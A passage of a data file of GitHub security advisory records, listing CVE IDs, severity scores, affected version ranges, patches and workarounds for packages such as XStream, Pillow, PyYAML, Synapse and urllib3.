'https://lists.debian.org/debian-lts-announce/2021/04/msg00002.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210430-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-21344.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/security.html#workaround'}, {'type': 'WEB', 'url': 'http://x-stream.github.io/changes.html#1.4.16'}]","{'cwe_ids': ['CWE-434', 'CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:23:49Z', 'nvd_published_at': '2021-03-23T00:15:00Z'}"
+1.4.0,GHSA-mx3r-w3pj-7wv7,2021-03-23T21:26:23Z,2021-03-19T21:10:30Z,2021-03-23T21:26:23Z,['CVE-2020-28431'],Command injection in wc-cmd,** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'wc-cmd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28431'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-WCCMD-1050423'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T23:48:14Z', 'nvd_published_at': '2021-02-23T16:15:00Z'}"
+1.4.0,GHSA-545q-3fg6-48m7,2023-09-12T20:51:14Z,2021-03-18T19:39:31Z,,['CVE-2021-23346'],html-parse-stringify and html-parse-stringify2 vulnerable to Regular expression denial of service (ReDoS),"This affects the package html-parse-stringify before 2.0.1; all versions of package html-parse-stringify2. Sending certain input could cause one of the regular expressions that is used for parsing to backtrack, freezing the process.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'html-parse-stringify'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'html-parse-stringify2'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23346'}, {'type': 'WEB', 'url': 'https://github.com/HenrikJoreteg/html-parse-stringify/commit/c7274a48e59c92b2b7e906fedf9065159e73fe12'}, {'type': 'WEB', 'url': 'https://github.com/HenrikJoreteg/html-parse-stringify/blob/master/lib/parse.js%23L2'}, {'type': 'WEB', 'url': 'https://github.com/HenrikJoreteg/html-parse-stringify/releases/tag/v2.0.1'}, {'type': 'WEB', 'url': 'https://github.com/rayd/html-parse-stringify2/blob/master/lib/parse.js%23L2'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1080633'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-HTMLPARSESTRINGIFY-1079306'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-HTMLPARSESTRINGIFY2-1079307'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T23:03:51Z', 'nvd_published_at': '2021-03-04T17:15:00Z'}"
+1.4.0,GHSA-jff3-mwp3-f8cw,2021-03-09T00:29:44Z,2021-03-09T00:38:31Z,,['CVE-2021-21360'],Exposure of Sensitive Information to an Unauthorized Actor in Products.GenericSetup,"### Impact
+_What kind of vulnerability is it? Who is impacted?_
+
+Information disclosure vulnerability - anonymous visitors may view log and snapshot files generated by the Generic Setup Tool.
+
+### Patches
+_Has the problem been patched? What versions should users upgrade to?_
+
+The problem has been fixed in version 2.1.1. Depending on how you have installed Products.GenericSetup, you should change the buildout version pin to 2.1.1 and re-run the buildout, or if you used pip simply do pip install `""Products.GenericSetup>=2.1.1""`
+
+### Workarounds
+_Is there a way for users to fix or remediate the vulnerability without upgrading?_
+
+Visit the ZMI Security tab at `portal_setup/manage_access` and click on the link _Access contents information_. On the next page, uncheck the box _Also use roles acquired from folders containing this objects_ at the bottom and check the boxes for _Manager_ and _Owner_. Then click on _Save Changes_. Return to the ZMI Security tab at `portal_setup/manage_access` and scroll down to the link _View_. Click on _View_, uncheck the box _Also use roles acquired from folders containing this objects_ at the bottom and check the boxes for _Manager_ and _Owner_. Then click on _Save Changes_.
+
+### References
+_Are there any links users can visit to find out more?_
+
+- [GHSA-jff3-mwp3-f8cw](https://github.com/zopefoundation/Products.GenericSetup/security/advisories/GHSA-jff3-mwp3-f8cw)
+- [Products.GenericSetup on PyPI](https://pypi.org/project/Products.GenericSetup/)
+- [Definition of information disclosure at MITRE](https://cwe.mitre.org/data/definitions/200.html)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in the [Products.GenericSetup issue tracker](https://github.com/zopefoundation/Products.GenericSetup/issues)
+* Email us at [security@plone.org](mailto:security@plone.org)",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'Products.GenericSetup'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/zopefoundation/Products.GenericSetup/security/advisories/GHSA-jff3-mwp3-f8cw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21360'}, {'type': 'WEB', 'url': 'https://github.com/zopefoundation/Products.GenericSetup/commit/700319512b3615b3871a1f24e096cf66dc488c57'}, {'type': 'WEB', 'url': 'https://pypi.org/project/Products.GenericSetup/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/21/1'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/22/1'}]","{'cwe_ids': ['CWE-200'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-03-09T00:29:44Z', 'nvd_published_at': '2021-03-09T01:15:00Z'}"
+1.4.0,GHSA-57h3-9rgr-c24m,2021-12-02T17:48:12Z,2021-03-29T16:35:16Z,,['CVE-2021-25289'],Out of bounds write in Pillow,An issue was discovered in Pillow before 8.1.1. TiffDecode has a heap-based buffer overflow when decoding crafted YCbCr files because of certain interpretation conflicts with LibTIFF in RGBA mode. NOTE: this issue exists because of an incomplete fix for CVE-2020-35654.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.1.0'}, {'fixed': '8.1.1'}]}], 'versions': ['8.1.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25289'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/3fee28eb9479bf7d59e0fa08068f9cc4a6e2f04c'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.1.1.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-33'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:07:48Z', 'nvd_published_at': '2021-03-19T04:15:00Z'}"
+1.4.0,GHSA-874w-m2v2-mj64,2022-10-07T13:10:52Z,2021-03-29T20:48:45Z,,['CVE-2019-15151'],Double Free in Adplug,AdPlug 2.3.1 has a double free in the `Cu6mPlayer` class in `u6m.h`.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'adplug'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.3.1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15151'}, {'type': 'WEB', 'url': 'https://github.com/adplug/adplug/issues/91'}, {'type': 'WEB', 'url': 'https://github.com/adplug/adplug/commit/1a282a486a8e33fef3e15998bf6408d3515dc07e'}, {'type': 'WEB', 'url': 'https://github.com/miller-alex/adplug/commit/8abb9328bf27dcbdafc67ade3e75af0ffd8f7633'}, {'type': 'PACKAGE', 'url': 'https://github.com/adplug/adplug'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q32A64R2APAC5PXIMSYIEFDQX5AD4GAS/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U3PW6PLDTPSQQRHKTU2FB72SUB4Q66NE/'}]","{'cwe_ids': ['CWE-415'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T20:51:24Z', 'nvd_published_at': '2019-08-18T21:15:00Z'}"
+1.4.0,GHSA-hf64-x4gq-p99h,2023-09-04T16:27:59Z,2021-03-18T19:55:34Z,,['CVE-2020-35655'],Pillow Out-of-bounds Read,"In Pillow before 8.1.0, SGIRleDecode has a 4-byte buffer over-read when decoding crafted SGI RLE image files because offsets and length tables are mishandled.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35655'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6BYVI5G44MRIPERKYDQEL3S3YQCZTVHE/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BF553AMNNNBW7SH4IM4MNE4M6GNZQ7YD/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/index.html'}]","{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T23:17:03Z', 'nvd_published_at': '2021-01-12T09:15:00Z'}"
+1.4.0,GHSA-8q59-q68h-6hv4,2021-09-28T19:04:49Z,2021-03-25T21:26:26Z,,['CVE-2020-14343'],Improper Input Validation in PyYAML,"A vulnerability was discovered in the PyYAML library in versions before 5.4, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. This flaw allows an attacker to execute arbitrary code on the system by abusing the python/object/new constructor. This flaw is due to an incomplete fix for CVE-2020-1747.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'PyYAML'}, 'ecosystem_specific': {'affected_functions': ['yaml.constructor.FullConstructor', 'yaml.constructor.UnsafeConstructor']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-14343'}, {'type': 'WEB', 'url': 'https://github.com/SeldonIO/seldon-core/issues/2252'}, {'type': 'WEB', 'url': 'https://github.com/yaml/pyyaml/issues/420'}, {'type': 'WEB', 'url': 'https://github.com/yaml/pyyaml/issues/420#issuecomment-663673966'}, {'type': 'WEB', 'url': 'https://github.com/yaml/pyyaml/commit/a001f2782501ad2d24986959f0239a354675f9dc'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1860466'}, {'type': 'PACKAGE', 'url': 'https://github.com/yaml/pyyaml'}, {'type': 'WEB', 'url': 'https://pypi.org/project/PyYAML/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-25T21:15:23Z', 'nvd_published_at': '2021-02-09T21:15:00Z'}"
+1.4.0,GHSA-x2jp-hh65-4xvf,2021-11-18T15:25:56Z,2021-03-29T20:42:15Z,,['CVE-2021-20280'],Cross-site scripting (XSS) and Server side request forgery (SSRF) in moodle,"Text-based feedback answers required additional sanitizing to prevent stored XSS and blind SSRF risks in moodle before 3.10.2, 3.9.5, 3.8.8, 3.5.17.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10'}, {'fixed': '3.10.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.9'}, {'fixed': '3.9.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.8'}, {'fixed': '3.8.8'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.5'}, {'fixed': '3.5.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20280'}, {'type': 'WEB', 'url': 'https://github.com/moodle/moodle/commit/a303eb9e9e387f95ea2a80cb1ce6c0b132ec1cc4'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1939037'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AFSNJ7XHVTC52RSRX2GBQFF3VEEAY2MS/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGOMHMYM3WICJ6D6U22Z6LPJGT5A6MZM/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFH5DDMU5TZ3JT4Q52WMRAHACA5MHIMT/'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=419651'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/164817/Moodle-Cross-Site-Scripting-Server-Side-Request-Forgery.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-24T23:18:11Z', 'nvd_published_at': '2021-03-15T22:15:00Z'}"
+1.4.0,GHSA-xgpf-p52j-pf7m,2021-03-24T17:41:15Z,2021-03-24T17:42:02Z,,['CVE-2021-27938'],XSS in CreateQueuedJobTask,A vulnerability has been identified in the Silverstripe CMS 3 and 4 version of the symbiote/silverstripe-queuedjobs module. A Cross Site Scripting vulnerability allows an attacker to inject an arbitrary payload in the CreateQueuedJobTask dev task via a specially crafted URL.,[],"[{'package': {'ecosystem': 'Packagist', 'name': 'symbiote/silverstripe-queuedjobs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symbiote/silverstripe-queuedjobs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '3.1.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symbiote/silverstripe-queuedjobs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symbiote/silverstripe-queuedjobs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symbiote/silverstripe-queuedjobs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symbiote/silverstripe-queuedjobs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '4.3.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symbiote/silverstripe-queuedjobs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.4.0'}, {'fixed': '4.4.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symbiote/silverstripe-queuedjobs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.5.0'}, {'fixed': '4.5.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symbiote/silverstripe-queuedjobs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.6.0'}, {'fixed': '4.6.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27938'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/symbiote/silverstripe-queuedjobs/CVE-2021-27938.yaml'}, {'type': 'WEB', 'url': 'https://github.com/symbiote/silverstripe-queuedjobs/releases'}, {'type': 'WEB', 'url': 'https://www.silverstripe.org/download/security-releases/cve-2021-27938'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-24T17:41:15Z', 'nvd_published_at': '2021-03-16T16:15:00Z'}"
+1.4.0,GHSA-f6hm-88x3-mfjv,2022-02-08T21:32:19Z,2021-03-22T23:29:19Z,,['CVE-2021-21349'],A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams from an arbitrary URL referencing a resource in an intranet or the local host,"### Impact
+The vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
+
+### Patches
+If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.16.
+
+### Workarounds
+See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs.
+
+### References
+See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-21349](https://x-stream.github.io/CVE-2021-21349.html).
+
+### Credits
+The vulnerability was discovered and reported by threedr3am.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [XStream](https://github.com/x-stream/xstream/issues)
+* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-f6hm-88x3-mfjv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21349'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ac71b047767205aa22e3a08cb33f3e0586de6b2fac48b425c6e16b0@%3Cdev.jmeter.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00002.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210430-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-21349.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/security.html#workaround'}, {'type': 'WEB', 'url': 'http://x-stream.github.io/changes.html#1.4.16'}]","{'cwe_ids': ['CWE-502', 'CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:26:25Z', 'nvd_published_at': '2021-03-23T00:15:00Z'}"
+1.4.0,GHSA-246w-56m2-5899,2021-08-31T21:07:23Z,2021-03-26T19:52:54Z,,['CVE-2021-21332'],Cross-site scripting (XSS) vulnerability in the password reset endpoint,"### Impact
+The password reset endpoint served via Synapse was vulnerable to cross-site scripting (XSS) attacks. The impact depends on the configuration of the domain that Synapse is deployed on, but may allow access to cookies and other browser data, CSRF vulnerabilities, and access to other resources served on the same domain or parent domains.
+
+### Patches
+This is fixed in #9200.
+
+### Workarounds
+Depending on the needs and configuration of the homeserver a few options are available:
+
+1. Password resets can be disabled by delegating email to a third-party service (via the `account_threepid_delegates.email` setting) or disabling email (by not configuring the `email` setting).
+
+2. If the homeserver is not configured to use passwords (via the `password_config.enabled` setting) then the affected endpoint can be blocked at a reverse proxy:
+
+ * `/_synapse/client/password_reset/email/submit_token`
+
+3. The `password_reset_confirmation.html` template can be overridden with a custom template that manually escapes the variables using [JInja2's `escape` filter](https://jinja.palletsprojects.com/en/2.11.x/templates/#escape). See the `email.template_dir` setting.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.27.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-246w-56m2-5899'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21332'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/9200'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/commit/e54746bdf7d5c831eabe4dcea76a7626f1de73df'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/synapse'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/releases/tag/v1.27.0'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNNAJOZNMVMXM6AS7RFFKB4QLUJ4IFEY/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-26T19:52:12Z', 'nvd_published_at': '2021-03-26T20:15:00Z'}"
+1.4.0,GHSA-3wvg-mj6g-m9cv,2023-09-04T16:26:56Z,2021-03-18T19:55:21Z,,['CVE-2021-27922'],Pillow Uncontrolled Resource Consumption,"Pillow before 8.1.1 allows attackers to cause a denial of service (memory consumption) because the reported size of a contained image is not properly checked for an ICNS container, and thus an attempted memory allocation can be very large.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27922'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S7G44Z33J4BNI2DPDROHWGVG2U7ZH5JU/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TQQY6472RX4J2SUJENWDZAWKTJJGP2ML/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZTSY25UJU7NJUFHH3HWT575LT4TDFWBZ/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.1.1.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-33'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T23:20:39Z', 'nvd_published_at': '2021-03-03T09:15:00Z'}"
+1.4.0,GHSA-5phf-pp7p-vc2r,2021-10-21T17:32:38Z,2021-03-19T19:42:11Z,,['CVE-2021-28363'],Using default SSLContext for HTTPS requests in an HTTPS proxy doesn't verify certificate hostname for proxy connection,"### Impact
+
+Users who are using an HTTPS proxy to issue HTTPS requests and haven't configured their own SSLContext via `proxy_config`.
+Only the default SSLContext is impacted.
+
+### Patches
+
+[urllib3 >=1.26.4 has the issue resolved](https://github.com/urllib3/urllib3/releases/tag/1.26.4). urllib3<1.26 is not impacted due to not supporting HTTPS requests via HTTPS proxies.
+
+### Workarounds
+
+Upgrading is recommended as this is a minor release and not likely to break current usage.
+
+Configuring an `SSLContext` with `check_hostname=True` and passing via `proxy_config` instead of relying on the default `SSLContext`
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [sethmichaellarson@gmail.com](mailto:sethmichaellarson@gmail.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'urllib3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.26.0'}, {'fixed': '1.26.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/urllib3/urllib3/security/advisories/GHSA-5phf-pp7p-vc2r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28363'}, {'type': 'WEB', 'url': 'https://github.com/urllib3/urllib3/commit/8d65ea1ecf6e2cdc27d42124e587c1b83a3118b0'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-db/tree/main/vulns/urllib3/PYSEC-2021-59.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/urllib3/urllib3'}, {'type': 'WEB', 'url': 'https://github.com/urllib3/urllib3/blob/main/CHANGES.rst#1264-2021-03-15'}, {'type': 'WEB', 'url': 'https://github.com/urllib3/urllib3/commits/main'}, {'type': 'WEB', 'url': 'https://github.com/urllib3/urllib3/releases/tag/1.26.4'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4S65ZQVZ2ODGB52IC7VJDBUK4M5INCXL/'}, {'type': 'WEB', 'url': 'https://pypi.org/project/urllib3/1.26.4/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-36'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202305-02'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': 